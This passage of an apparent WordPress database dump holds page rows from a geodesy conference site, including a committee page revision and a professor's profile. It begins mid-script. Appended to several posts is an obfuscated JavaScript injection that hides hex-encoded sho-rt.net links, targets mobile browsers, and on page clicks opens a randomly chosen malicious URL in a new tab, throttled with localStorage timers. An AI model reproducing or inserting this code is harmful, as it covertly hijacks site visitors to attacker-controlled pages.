_0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Local Science Committee','','inherit','closed','closed','','3554-revision-v1','','','2023-01-14 19:15:29','2023-01-14 19:15:29','',3554,'https://gsw2023.com/?p=3557',0,'revision','',0),
(3558,1,'2023-01-14 19:19:15','2023-01-14 19:19:15','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Local Science Committee','','inherit','closed','closed','','3554-revision-v1','','','2023-01-14 19:19:15','2023-01-14 19:19:15','',3554,'https://gsw2023.com/?p=3558',0,'revision','',0),
(3559,1,'2022-02-20 19:31:59','2022-02-20 19:31:59','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"left\",\"placeholder\":\"Write title…\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-left has-large-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong>Prof. Dr. Mohamed E A El Tokhey, </strong>Professor of Surveying and Geodesy, Former Vice-President of Education and Student Affairs of Ain Shams University, and former Dean of Faculty of Engineering, Ain Shams University. Dr. El Tokhey supervised and examed more than 30 Masters and Ph.D. Theses. Dr. El Tokhey published more than 50 researches. Also, Dr. Mohamed El Tokhey is surveying, consulting, and participating in hundreds of engineering projects, such as the newly established cities such as New Cairo, Zayed, and New Administration City.<br> <br>Dr. El Tokhey was a consultant of the Survey of Egypt Authority, especially in the network adjusting, computing the adopted transformation parameters, and establishing the COORS network<br> </td></tr></tbody></table></figure>\n<!-- /wp:table --></div></div>\n<!-- /wp:cover --></div>\n<!-- /wp:group -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Dr. Mohamed E A El Tokhey','','publish','closed','closed','','prof-dr-mohamed-e-a-el-tokhey','','','2023-04-02 07:25:25','2023-04-02 07:25:25','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3559',0,'dt_team','',0),
(3560,1,'2023-01-14 19:31:14','2023-01-14 19:31:14','','loc1','','inherit','open','closed','','loc1','','','2023-01-14 19:31:14','2023-01-14 19:31:14','',3559,'https://gsw2023.com/wp-content/uploads/2023/01/loc1.jpg',0,'attachment','image/jpeg',0),
